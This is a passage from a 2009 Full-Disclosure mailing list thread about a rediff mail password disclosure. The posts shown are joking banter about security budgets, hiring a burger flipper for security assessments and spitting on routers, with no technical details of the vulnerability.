a server of yours will be hacked once every year, and cost you $1,200 to clean
up, then if you're spending more than $100/month in security you're being an
idiot.  Especially if you can do good PR spin on it:

I'm Dan Kaminsky - hated by hackers the world over.  Our systems average
25,392 attacks per day, and in 4 years only one has gotten through.  If we
can do that when under attack by the worst the world has to offer, imagine
what we can do for *your* business.

:)




Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-11 Thread full-censorship
On Fri, 11 Sep 2009 22:27:41 +0100 valdis.kletni...@vt.edu wrote:
> On Fri, 11 Sep 2009 21:49:00 BST, you said:
>
>> would one not rather hire someone *not* well-known and *doesn't*
>> get owned?
>
> Feel free to hire that guy flipping burgers at McD's to do your security
> assessment.

the burger flipper would be the obvious choice, young and eager to 
learn.



Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-11 Thread Rohit Patnaik
full-censors...@hushmail.com wrote:
> On Fri, 11 Sep 2009 22:27:41 +0100 valdis.kletni...@vt.edu wrote:
>> On Fri, 11 Sep 2009 21:49:00 BST, you said:
>>
>>> would one not rather hire someone *not* well-known and *doesn't*
>>> get owned?
>>
>> Feel free to hire that guy flipping burgers at McD's to do your security
>> assessment.
>
> the burger flipper would be the obvious choice, young and eager to
> learn.
   
The choice is obvious only as long as you ignore the fact that eager to 
learn also means eager to make mistakes.  After all, isn't trying (and 
failing) the most effective method of learning?

--Rohit Patnaik



Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-11 Thread mrx
Rohit Patnaik wrote:
> full-censors...@hushmail.com wrote:
>> On Fri, 11 Sep 2009 22:27:41 +0100 valdis.kletni...@vt.edu wrote:
>>> On Fri, 11 Sep 2009 21:49:00 BST, you said:
>>>
>>>> would one not rather hire someone *not* well-known and *doesn't*
>>>> get owned?
>>>
>>> Feel free to hire that guy flipping burgers at McD's to do your security
>>> assessment.
>>
>> the burger flipper would be the obvious choice, young and eager to
>> learn.
 
> The choice is obvious only as long as you ignore the fact that eager to
> learn also means eager to make mistakes.  After all, isn't trying (and
> failing) the most effective method of learning?
>
> --Rohit Patnaik
   
But how does spitting on a router help to secure it?



Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail

2009-09-11 Thread Lincoln Anderson
If you spit on it in just the right spot, you will have created a brick-wall
- an oft underappreciated network device that both livens the décor of any
datacenter and obviates the need for most security practices.

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of mrx
Sent: Friday, September 11, 2009 6:58 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Plain Text Password Disclosure vulnerability
in rediff mail

Rohit Patnaik wrote:
> full-censors...@hushmail.com wrote:
>> On Fri, 11 Sep 2009 22:27:41 +0100 valdis.kletni...@vt.edu wrote:
>>> On Fri, 11 Sep 2009 21:49:00 BST, you said:
>>>
>>>> would one not rather hire someone *not* well-known and *doesn't*
>>>> get owned?
>>>
>>> Feel free to hire that guy flipping burgers at McD's to do your security
>>> assessment.
>>
>> the burger flipper would be the obvious choice, young and eager to
>> learn.
 
> The choice is obvious only as long as you ignore the fact that eager to
> learn also means eager to make mistakes.  After all, isn't trying (and
> failing) the most effective method of learning?
>
> --Rohit Patnaik
   
But how does spitting on a router help to secure it?
